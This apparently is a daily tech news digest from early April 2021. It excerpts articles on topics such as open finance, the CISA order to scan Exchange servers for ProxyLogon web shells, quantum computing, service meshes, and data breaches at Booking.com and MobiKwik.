While the incident itself was troubling, the Dutch Data Protection Authority called out Booking.com for its response to the breach. The company, according to the report, first found out about the security lapse on Jan. 13, 2019, but waited until Feb. 7 of that year to alert authorities. Under GDPR rules, organizations must report a breach within 72 hours of its occurrence. By the time Booking.com notified the Dutch Data Protection Authority, more than 20 days had elapsed. Monique Verdier, the vice president of the Dutch privacy watchdog, noted in the report that the delay in reporting the incident could have put additional customers at risk and showed a disregard for their data. "That speed is very important for the victims of a leak," Verdier said. "After such a report, the AP can, among other things, order a company to immediately warn affected customers. In this way, for example, to prevent criminals from having weeks to continue trying to defraud customers." A spokesman for the company could not be immediately reached for comment on Friday, but the report notes that Booking.com would not appeal the fine.



Quote for the day:

"Enjoy the little things, for one day you may look back and realize they were the big things." -- Robert Brault

Daily Tech Digest - April 02, 2021

Open banking is big. Here’s why open finance is bigger

Open finance will improve the experience for customers in the U.S., but they won’t really notice it directly, Costello says. However, under the hood, they’ll benefit from more reliability and more symmetric customer protection end to end — and that will make a big difference. This move to a regulated open finance experience will give customers not just uniform access to all of the data, but under the same umbrella of symmetric customer protection, their payment account data will be as safe as their loan data, payroll data, and so on. “The customer experience for the person who needs to use these services but is reluctant to is going to be incredibly positively impacted,” he says. “Now they’re going to have enough trust in these tools and services to know that if they’re harmed in some way, if there’s a breach in the system or a bad actor, they’re going to be protected.” “As this ecosystem takes off, the data that is being generated, correlated, and used is beneficial not just for the consumer and their direct third-party service providers, but by all thirdparty service providers,” Costello says


5 key cybersecurity risks in 2021, and how to address them now

Cybersecurity technologies have become more advanced and more available than ever, and this has led to a consistent pattern of over-reliance on point products to defend against threats. While technology is essential to this mission, it isn’t a standalone solution. Oftentimes, mid-market businesses lack dedicated cybersecurity resources that are just as valuable. This skill shortage has been heightened by the pandemic, as the network diagram has expanded to include surfaces like at-home PCs and other WFH access points. According to the Verizon DBIR, almost one in three data breaches in 2020 involved small businesses, and mitigation will take a planned combination of both people, processes and technology. Hiring more security professionals, especially with the growth in demand, can be an expensive undertaking. Rather than investing in an internal 24/7 security operations center (SOC), outsourcing this work has become an appealing option that is a cost-effective and essential addition to your defense strategy. This team can work in a way that unifies disparate technologies with process to create a singular, strong point of visibility.


Is the Future of Manufacturing Automated or Autonomous?

Manufacturing autonomy is not just a good idea, it’s a timely idea, offering a chance to democratize both manufacturing and innovation. By creating autonomous and automated manufacturing solutions, it is possible to substantially reduce the labor cost element in manufacturing, allowing higher labor cost regions to bring manufacturing home. This is extremely timely given the desire of most nations to use manufacturing as part of their post-pandemic recovery strategy. And the pandemic isn’t the only driver or acceleration. The Covid-19 pandemic came on the back of a bitter trade war between the US and China, creating a perfect storm of disruption that has led to a real desire to restore supply chains to make nations more resilient to future risk. Both Theo and Yoav agree that autonomous and automated manufacturing solutions offer the only route to competitiveness for the US and for Western Europe, where the benefits of massive consumer markets are offset by high labor rates. Consumers want to buy products made locally, but they don’t want to pay more for, or get less from, those products. 


CISA Orders Agencies to Recheck for Exchange Compromises

CISA is requiring federal agencies that use on-premises Exchange servers to conduct two exercises by noon Monday. The agencies must run Microsoft's Safety Scanner tool, also known as MSERT, in full scan mode and report those results to CISA. This tool, which was released last month, can detect web shells used during attacks that target the ProxyLogon flaw in Exchange. CISA is also ordering federal agencies to run this same scan every week for four weeks to check for additional compromises. In addition to mandating MSERT sans, CISA is requiring that agencies run a script called Test-ProxyLogon.ps1 to check both Exchange and Internet Information Services, or ISS, logs for any malicious activity related to these attacks. "If attacker activity is identified, the script reports the vulnerabilities for which it found evidence of use and collects logs that it stores in the specified output path in the Test-ProxyLogonLogs directory," CISA notes. After those tasks are complete and the results are returned, CISA is requiring that federal agencies take additional steps to harden networks and infrastructure by June 28.


Quantum computer has the edge for NP verification

The algorithm the researchers use to demonstrate this is known as an interactive proof protocol. Here, one component of the experimental set-up acts as a “prover”, using coherent light pulses to send partial solutions to the NP-complete problem in the form of a quantum state. The second component fills the role of the “verifier”, deciding with high accuracy whether the solution is correct based on the limited information given. When certain bounds are placed on the expected accuracy of the verifier, as well as the protocol’s speed and efficiency in terms of the amount of information that can be communicated throughout the interactions, it is possible to demonstrate that the quantum algorithm far outperforms any classical attempts at doing the same. By showing that a quantum algorithm can verify solutions to NP-complete problems efficiently, the result could allow for new applications in secure remote quantum computing. A client with a rudimentary quantum machine could, for example, verify information they receive from a powerful quantum server without ever having access to the full solution. 


Blockchain Comes Under Data Privacy Scrutiny

The decentralized nature of blockchain eliminates the need for an intermediary serving as a central clearing authority and decreases risks associated with traditional centralized systems and their functionality. By removing the intermediary between a given server and the data being collected, distributed, and analyzed, blockchain enables an increase in the speed and efficiency of data processing. Additionally, blockchain reduces the risk of human error, which typically leads to a reduction in costs and expenses. Traceability is one of the major benefits of blockchain that businesses in various industries are exploiting. Tracing transactions on blockchain is simplified because all data is stored on one immutable digital distributed ledger, which makes it easy to review the history of transactions. The traceability element of blockchain has been especially useful for businesses distributing products on a complicated supply chain because blockchain facilitates tracking within a supply chain. Blockchain will increasingly change how businesses operate in various industries and sectors, but this disruptive technology will undoubtedly continue to face legal and regulatory challenges as it becomes more widely accepted.

Cisco streamlines, upgrades its SASE bundle

The offering includes Cisco's Viptella and Meraki SD-WAN software packages, Duo and AnyConnect remote access, Umbrella security as well as Duo zero trust and other security components. The integrated package will be a plus for enterprises, experts say. “Eighty percent of organizations want to reduce the number of security vendors and products to create a more integrated protection/incident-response and easier to manage security operations," said Peter Firstbrook, a Gartner research vice president. “Reducing the barriers to adoption and increasing the level of integration is going to be a major task for multi-product vendors,” Firstbrook said. “At the same time SASE is a hot topic as more network traffic moves off the LAN and into the cloud. The more of this problem that Cisco can address the more successful they will be.” Within the bundle Cisco added features including the ability to support remote browser isolation, data loss prevention (DLP), cloud malware detection, and support for Cisco Meraki MX environments with Umbrella security. “DLP and remote browser isolation are desirable but they are catch-up items," Firstbrook said.


A strategic vision for model risk management

Banks face cost and capacity pressures as they strengthen frameworks and expand model inventories. Validation backlogs and delays mount as existing validation capacity fails to cover expanding demand. Inventory is increasing as new models are developed outside traditional areas of financial risk. The rapid development of AI is increasing model complexity and adding to the backlog. The quality of validation can consequently suffer unless the bank brings in external support. To manage the model-validation budget, leading banks have industrialized validation, using lean fundamentals and automated processes. Models are prioritized for validation based on key factors such as their importance in business decisions and materiality of the model exposure. Validation intensity is customized by model tiers to improve speed and efficiency. Likewise, model tiers are used to define the resource strategy and governance approach. The use of model tiers to improve efficiency varies by region. In Asia and Latin America, where MRM functions are still maturing, about half our surveyed banks report using tiers in their model inventory. 


Bitcoin was always bound to fail its most important mission

Although Bitcoin has been around for more than a decade, the cryptocurrency industry is still in its nascent stages and the process of maturation requires all manner of approaches to be explored. The underlying technology has already come a long way and so have its alternative use cases (look at the rise of DeFi), but crypto is still largely battling the same demons: volatility, limited adoption and regulatory uncertainty. However, Schwartz is convinced the magnetism of cryptocurrency and the commitment of the community to innovation will mean technological solutions are found to some of these most pressing questions. “It’s going to be an interesting growing up process for cryptocurrency, because regulators have legitimate interest in preventing things like money laundering and terrorist financing. But most [members of the crypto space] want to comply with these kinds of measures.” “Generally speaking, it's not a very good business model to be in defiance of regulation. And it has been a drag on the adoption of crypto that people have had difficulty figuring out how to remain compliant.”


Importance of data governance and management in times of a global pandemic

The problem of data governance has now become prominent. Data governance is different from data management. The latter has to do with the engineering aspects of data – how it is created, stored, accessed, processed, secured, and whether it is complete, are issues that are of relevance. Data governance, on the other hand, is concerned with issues of policy, which are larger and have an impact on the economy and society. Data governance has to do with where data originates, who collects it and how, where it is stored, who uses it and for what purpose, how the information obtained from data is used, and how data is erased. Data governance presents many challenges, contradictions, and consequent trade-offs. For example, one challenge is that of maintaining privacy of data on individuals versus using data for surveillance. During the pandemic this contradiction became prominent. Several countries, including India, introduced infection-tracking software that would inform individuals who were using these apps whether they were close to others who were infected.



Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them." -- Warren G. Bennis

Daily Tech Digest - April 01, 2021

How standard silicon chips could be used for quantum computing

To create and read qubits, which are the building blocks of those devices, scientists first have to retain control over the smallest, quantum particles that make up a material; but there are different ways to do that, with varying degrees of complexity. IBM and Google, for example, have both opted for creating superconducting qubits, which calls for an entirely new manufacturing process; while Honeywell has developed a technology that individually traps atoms, to let researchers measure the particles' states. These approaches require creating new quantum processors in a lab, and are limited in scale. Intel, for example, has created a 49-qubit superconducting quantum processor that is about three inches square, which the company described as already "relatively large", and likely to cause complications when it comes to producing the million-qubit chips that will be required for real-world implementations at commercial scale. With this in mind, Quantum Motion set off to find out whether a better solution could be found in proven, existing technologies. "We need millions of qubits, and there are very few technologies that will make millions of anything – but the silicon transistor is the exception," John Morton, ... tells ZDNet.


Top 5 Attack Techniques May Be Easier to Detect Than You Think

The analysis shows attackers for the most part are continuing to rely on the same techniques and tactics they have been using for years. And, despite all the concern about sophisticated advanced persistent threat (APT) actors and related threats, the most common threats that organizations encountered last year are what some would classify as commodity malware. "Although the threat landscape can be overwhelming, there are many opportunities we have as defenders to catch threats in [our] networks," says Katie Nickels, director of intelligence at Red Canary. "The challenge for defenders is to balance the 'tried and true' detection opportunities that adversaries reuse with keeping an eye on new techniques and threats." Red Canary's analysis shows attackers most commonly abused command and script interpreters like PowerShell and Windows Command Shell to execute commands, scripts, and binaries. ... Attackers most commonly took advantage of PowerShell's interactive command-line interface and scripting features to execute malicious commands, obfuscate malware, and malicious activity to download additional payloads and spawn additional processes.


Preparing for enterprise-class containerisation

Beyond the challenges of taking a cloud-native approach to legacy IT modernisation, containers also offer IT departments a way to rethink their software development pipeline. More and more companies are adopting containers, as well as Kubernetes, to manage their implementations, says Sergey Pronin, product owner at open source database company Percona. “Containers work well in the software development pipeline and make delivery easier,” he says. “After a while, containerised applications move into production, Kubernetes takes care of the management side and everyone is happy.” Thanks to Kubernetes, applications can be programmatically scale up and down to handle peaks in usage by dynamically handling processor, memory, network and storage requirements, he adds. However, while the software engineering teams have done their bit by setting up auto-scalers in Kubernetes to make applications more available and resilient, Pronin warns that IT departments may find their cloud bills starting to snowball. For example, an AWS Elastic Block Storage user will pay for 10TB of provisioned EBS volumes even if only 1TB is really used. This can lead to sky-high cloud costs.


Practical Applications of Complexity Theory in Software and Digital Products Development

The first radical idea has to do with the theory and practice of Complexity. The second radical idea has to do with the human element in Complexity theory. Let’s start with the first one. Most of the literature on Complexity and most of the conversations revolving around Complexity are theoretical. This is true and has been true in the last 17 years, also in the software development community, in the products development community, and more in general in the broader Lean and Agile community. When you look into real teams and organisations, here and there you will find some individual who is passionate about Complexity, who knows the theory, and who is using it to interpret, understand, and make sense of the events happening around her/him and reacting in more effective ways. Complexity gives her/him an edge. But such a presence of Complexity thinking is confined. The first new radical idea is to shift up-side-down the centre of gravity of the conversation around Complexity; to make the practical applications of Complexity theory prominent.


Researchers show that quantum computers can reason

Admittedly, it’s not like you can run down to Best Buy today and purchase a quantum computer. They are not yet ubiquitous. IBM apparently is collecting quantum computers the way Jerry Seinfeld collects classic and rare cars. Big Blue also is installing a quantum computer at Cleveland Clinic, the first private-sector recipient of an IBM Quantum System One. But quantum computing’s time in the sun inches inexorably closer. “Quantum computing (QC) proof of concept (POC) projects abound in 2021 with commercialization already happening in pilots and building to broader adoption before 2025,” REDDS Capital Chairman and General Partner Stephen Ibaraki writes in Forbes. “In my daily engagements’ pro bono with global communities – CEOs, computing science/engineering organizations, United Nations, investments, innovation hubs – I am finding nearly 50% of businesses see applications for QC in five years, though most don’t fully understand how this will come about.” IBM has not been the only major tech company developing quantum computing technology. 


Service Meshes: Why Istio? An Introduction

In any microservice-based architecture, whenever there is a service call from one microservice to another. We are not able to infer or debug what is happening inside the networked service calls. This might lead to serious problems when we are not able to diagnose properly what is the problem if an unwanted situation arises. For example; performance issues, security, load balancing problems, tracing the service calls, or proper observability of the service calls. The severity of the issue gets multiplied when you have to cater to many microservices for any application to work properly. ... Istio has the most features and flexibility of any of these three service meshes by far: Cascading failure prevention (circuit breaking); Authentication and authorization. The service mesh can authorize and authenticate requests made from both outside and within the app, sending only validated requests to instances; Resiliency features (retries, timeouts, deadlines, etc.); Robust load balancing algorithms.
Control over request routing (useful for things like CI/CD release patterns); The ability to introduce and manage TLS termination between communication endpoints; Rich sets of metrics to provide instrumentation at the service-to-service layer ...


Is Explainability In AI Always Necessary?

With increasing sophistication and completeness, the system becomes less understandable. “As a model grows more realistic, it becomes more difficult to understand,” said David Hauser at the recently concluded machine learning developers conference. According to Hauser, clients want the model to be understandable and realistic.This is another paradox a data scientist has to live with. He also stressed that understandable solutions give up on accuracy. For instance, network pruning one such technique which takes a hit on accuracy. The moment non-linearities or interactions are introduced, the answers become less intuitive. ... One of the vital purposes of explanations is to improve ML engineers’ understanding of their models to refine and improve performance. Since machine learning models are “dual-use”, explanations or other tools could enable malicious users to increase capabilities and performance of undesirable systems. There is no denying that explanations allow model refinement. And, as we go forward, apart from the debugging and auditing of the models, organisations are looking at data privacy through the lens of explainability.


Leaker Dismisses MobiKwik's Not-So-Nimble Breach Denial

MobiKwik hasn't done itself any favors in its handling of this episode, noting that when the allegedly stolen data came to light in February, it "undertook a thorough investigation with the help of external security experts and did not find any evidence of a breach." Subsequently, after they reviewed the leaker's sample of stolen data, "some users have reported that their data is visible on the dark web," it adds, but then it says other breaches must be to blame. "While we are investigating this, it is entirely possible that any user could have uploaded her/ his information on multiple platforms. Hence, it is incorrect to suggest that the data available on the dark web has been accessed from MobiKwik or any identified source," MobiKwik claims. But the company says that despite having already brought in "external security experts" to investigate, it's now bringing in more, "to conduct a forensic data security audit." Hence, it's unclear what the first group of investigators might have done. ... Reuters on Thursday, citing an anonymous source with knowledge of the discussions, reported that the Reserve Bank of India was "not happy" with MobiKwik's statements, and ordered it to immediately launch a full digital forensic investigation.


New Storage Trends Promise to Help Enterprises Handle a Data Avalanche

Data virtualization has been around for some time, but with increasing data usage, complexity, and redundancy, the approach is gaining increasing traction. On the downside, data virtualization can be a performance drag if the abstractions, or data mappings, are too complex, requiring extra processing, Linthicum noted. There's also a longer learning curve for developers, often requiring more training. ... While not exactly a cutting-edge technology, hyper-converged storage is also being adopted by a growing number of organizations. The technology typically arrives as a component within a hyper-converged infrastructure in which storage is combined with computing and networking in a single system, explained Yan Huang, an assistant professor of business technologies at Carnegie Mellon University's Tepper School of Business. Huang noted that hyper-converged storage streamlines and simplifies data storage, as well as the processing of the stored data. "It also allows independently scaling computing and storage capacity in a disaggregated way," she said. 


The importance of tech, training and education in data classification

We have seen how automation plays a key role in establishing a firm foundation for an organisation’s security culture, but given employees play such a vital role in ensuring that business maintains a strong data privacy posture, the ability to work with stakeholders and users to understand data protection requirements and policies is key. Security and data protection education must be conducted company-wide and must exist at a level that is workable and sustainable. Regular security awareness training and a company-wide inclusive security culture within the business will ensure that data security becomes a part of everyday working practice, embedded into all actions and the very heart of the business. A robust data protection protocol is critical for all organisations, and will particularly be the case as we move beyond Covid-19 into the new normal. Delivering optimal operational efficiencies, data management and data classification provision under post-pandemic budget constraints will be an ongoing business-critical challenge. To do nothing, however, will set up an organisation to fail, and we have already seen large fines incurred for those that have not given data security enough of a priority.



Quote for the day:

"Leadership cannot just go along to get along. Leadership must meet the moral challenge of the day." -- Jesse Jackson